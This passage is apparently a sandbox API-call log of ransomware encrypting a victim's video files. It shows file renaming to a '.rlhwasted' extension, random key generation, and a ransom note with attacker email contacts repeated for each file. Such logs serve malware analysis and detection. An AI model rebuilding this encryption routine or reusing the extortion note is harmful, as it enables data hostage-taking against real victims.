returned 1 [0197.232] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.232] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.232] lstrcpyW (in: lpString1=0x6e8a30, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\DuzaOT6Ag2.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\duzaot6ag2.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\DuzaOT6Ag2.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\duzaot6ag2.flv.rlhwasted")) returned 1 [0197.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\DuzaOT6Ag2.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\duzaot6ag2.flv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.234] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0197.234] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x6ceb [0197.234] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6ceb) returned 0x6a0000 [0197.234] CloseHandle (hObject=0x104) returned 1 [0197.238] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.238] CloseHandle (hObject=0x124) returned 1 [0197.239] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.239] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0197.240] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.240] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.240] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0197.313] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0197.313] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.329] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.329] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.329] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.329] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]oRz/uAoSDvxp34SUQUT9yuVuvB9CK1uAnQRK4PAEK0iWbidVplp/XD88it/FeIdr\r\nodhb4j6Xu4otMN5Yx6behaWorAZy538H7g6SPXxXo3KSZwG4iFz1ilJcBushC63u\r\nLpivg4pK45dJNOB31ZOcsAnBwjTq5+r8M1XYSNu/F/wf4is80xksHxQCXa+Lz5Ry\r\nJpj/V+vOWpu1hpjrjHWmCgZYuvvlRz+NCcZAqzxJ5IywWyfO/lz5YyKnJ/xqe80E\r\nxe4QK6YCr0SvpKLCDAGD1OmW7+i7r2aE/yMwKuTWsR7Xqh2odT9k+4oO12teDgT+\r\nd3Jlf/myXx2D/3WicgLfy9azNo5QY89ESs+oL2u1abM81m5/NZP4ePE53QR3qEOc\r\nlWqWpkSu842KiUHTquBzp2uQ7B1qX/TIA0Tcx6FJ3zdE9JN0P8f2n6xyn/gkDt/x\r\nD7Q2dlaLt4YIcUKP5uwoCsWnrHSkBAKztd+P4zYzcobkJR3wrFUDWfdsoFBWTLX9\r\nzDypQWuuy8obfVjgf7QS1dIzmjX1W5xrQA2A6ZOKXNo14U5z6GgH6h6droqw85sv\r\nFp4gU8vG6zgA+XcETLV1QMeunwZKmbgdhF/ZAvbK0CC2ifwqu6xTse+hQSBPLxvD\r\nRwehvJOLnNrSSIGSByvIH6b4+QF3Gzr7stc0R5ZqWJZ=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.329] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.329] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0197.329] SetEndOfFile (hFile=0x108) returned 1 [0197.332] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.332] CloseHandle (hObject=0x108) returned 1 [0197.336] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.337] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x7049a8 | out: hHeap=0x6b0000) returned 1 [0197.337] _aulldvrm () returned 0x0 [0197.337] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0197.338] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.338] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.338] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\1uVt.mkv") returned 105 [0197.338] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2dc) returned 0x6e8978 [0197.338] lstrcpyW (in: lpString1=0x6e8a4a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.338] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.338] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0197.339] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.339] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\1uVt.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\1uvt.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.477] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.478] SetEndOfFile (hFile=0x108) returned 1 [0197.478] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.478] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.478] lstrcpyW (in: lpString1=0x6e8a4a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\1uVt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\1uvt.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\1uVt.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\1uvt.mkv.rlhwasted")) returned 1 [0197.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\1uVt.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\1uvt.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0197.479] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0197.479] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xfbca [0197.479] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfbca) returned 0x6a0000 [0197.480] CloseHandle (hObject=0x128) returned 1 [0197.483] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.484] CloseHandle (hObject=0x124) returned 1 [0197.484] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.484] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0197.485] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.485] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.485] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0197.485] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0197.486] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.544] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.544] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.544] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.544] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Cy4kXCXdR59Jq7kCkVTSJZZ4pEoGgq841UyUofAPXtlIgpXLIQa2uF7L8dZ9PETr\r\nOJqyJoHmCLnBI3tlboCq9k6so23LmKnkVDVedW+ZpVuXCflbHyUrDj57HDEn7bPW\r\nNxA/1PgqK0jy7q0b3D4FGEaRcTy8OSJWORurcWYrQu3HPjMfsUFBAA1IhVCbgD5b\r\nt0PiJeW+oKGCk8KyHlBS2iLpFFXO7qDGJHi1b2y2CcRRntLmiN/Am4N/l65iKaJZ\r\nBF0YQgWb9RaGCVulI2OHqOGpkxwWzc4+/d7us5On7pCX4l04XFzPGZIShJ5IPmFN\r\nZjnyB+SNo032XXscwUv7i+ApXGGxwa5OZ0JMHWqRZN0UrYVivYXehAQvbv8nuQou\r\n40p/y2KPSqMgrXO9DOUs+TIj6+EAR9u7FC8whXeVGoLZQIVxiKzFTeaVmKsqLB1N\r\nG8iSsTjNUf6Vlz5HYkD4k+EWN73x/3Wd2qDuDuZnLKsuqJA2FuHeHFxmfymMZZSD\r\n8fc8YeMztDCr35+4NJ5TQv7lEkZea7KNPKyuQWWn0662K6VLesj7GDtMDmvmfZOM\r\nhANELjc+LXHRC1ZEZjscPXSWvtBm+NiL75ABwI8AV/4y6hUltIaHe2WzFWAdelzS\r\nkX6+iSbK5TEv1iTHY1k/XtRT2E1h0kp9FHO6iEHrSv7=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.544] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.544] WriteFile (in: hFile=0x108, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0197.545] SetEndOfFile (hFile=0x108) returned 1 [0197.548] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.548] CloseHandle (hObject=0x108) returned 1 [0197.552] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.552] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715250 | out: hHeap=0x6b0000) returned 1 [0197.553] _aulldvrm () returned 0x0 [0197.553] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0197.554] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.554] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.554] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\k57TEKvUjqx.flv") returned 122 [0197.554] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2fe) returned 0x6e8978 [0197.554] lstrcpyW (in: lpString1=0x6e8a6c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.554] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.554] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0197.555] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0197.555] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\k57TEKvUjqx.flv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\k57tekvujqx.flv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.556] WriteFile (in: hFile=0x108, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.557] SetEndOfFile (hFile=0x108) returned 1 [0197.557] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.557] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.557] lstrcpyW (in: lpString1=0x6e8a6c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\k57TEKvUjqx.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\k57tekvujqx.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\k57TEKvUjqx.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\k57tekvujqx.flv.rlhwasted")) returned 1 [0197.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\k57TEKvUjqx.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\k57tekvujqx.flv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0197.558] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0197.558] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x752c [0197.558] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x752c) returned 0x6a0000 [0197.558] CloseHandle (hObject=0x124) returned 1 [0197.561] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.561] CloseHandle (hObject=0x128) returned 1 [0197.561] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.562] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0197.563] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.563] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.563] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0197.564] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0197.564] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.574] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.574] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.574] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.574] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BOMuEhBXQfYmBiSt3cTCzM5Y8ELY+Rxb+JAxDCIYnedN0JXnOhd6Fj4yRvnCno7j\r\n1zre8McdtOZFcRR9aN+xjhkZPjwk80Szx1WE0NOUuXJBHCeikUTVr2T3QB1u5W3x\r\nNAQB5XjN6e6kA5Vrzi+h1C2DWDZ0snjIrsKT1SYVKImLVhVyABjEz41Q+mTf9TlW\r\nhSPvyuSfG4dLXO67+StilNGcrby+aQbq/LTus7xHyjTtx6gjqs1Pyi6O5pBXznsA\r\nFMJRE8UOO/ysEX71vZ1txXxrazm5yMjNGJC4+exaTiOtVYGMWwvLO++Mr9pB3XK0\r\nOLMcyK2FBCz1SE2zVbsezFQrMjvdBinYH/Us8hD7MQo/FIqFAMz+Q4habsmZ3rxl\r\nUwrdcJHYyaekOuwxUXaIDYbTKl32RYz3DL4fqMjl35vgQKAb8Y1tBtMEjGtM14DJ\r\nNJQozaz2xJJegyKXYu2j99Ms5KVqP5CRvf2GiC/wyQqMOgvxHKF7HHSFBlJKp0zL\r\nnCgTtAK8O3QYKX0oeOg42QvlptSBk8Alt0ruUQ17jklQ+bJUhFkgRxmIQvMteTHc\r\nojxqKAag4m1uYCE7hRFGiCGPS8wwqya5QRNQGBeZxhBd+eaqEovuuSzcUwyD2Avn\r\n01xkhiSrCd/QS3CBOObVVSgpJz6SetvMF8Q3MJ+K4NO=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.574] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.574] WriteFile (in: hFile=0x108, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0197.574] SetEndOfFile (hFile=0x108) returned 1 [0197.577] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.577] CloseHandle (hObject=0x108) returned 1 [0197.580] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.580] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715738 | out: hHeap=0x6b0000) returned 1 [0197.580] _aulldvrm () returned 0x0 [0197.580] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0197.581] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.581] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.581] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\pFRR4i4qEIllHkWV.avi") returned 127 [0197.581] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x308) returned 0x6e8978 [0197.581] lstrcpyW (in: lpString1=0x6e8a76, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.582] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.582] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0197.583] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0197.583] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\pFRR4i4qEIllHkWV.avi.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\pfrr4i4qeillhkwv.avi.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.637] WriteFile (in: hFile=0x108, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, 